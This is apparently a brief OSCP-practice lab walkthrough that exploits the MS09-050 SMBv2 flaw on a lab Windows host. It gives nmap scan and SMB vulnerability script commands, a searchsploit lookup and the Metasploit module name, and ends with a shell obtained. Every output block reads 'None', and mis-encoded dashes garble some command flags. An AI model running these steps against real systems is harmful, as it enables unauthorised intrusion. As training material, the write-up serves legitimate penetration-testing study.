Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

Step 1: Reconnaissance

Nmap Scan

nmap -sCV -A โ€” min-rate 1000 <TARGET_IP>

None

Key findings: smb port open

smb Enumeration โ€” Port 135,139

nmap โ€” script smb-vuln* 192.168.205.40

None

Step 2: Vulnerability Research

searchsploit MS09โ€“050

None

EDB-40280 matches the running version. Use msfconsole

Step 3: Exploitation โ€” msfconsole for smbv2

msfconsole

None

Modify & Run the Exploit

Update the exploit with target IP, and use this exploit

None

Use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

None

Run:-

None

Initial Shell Received

None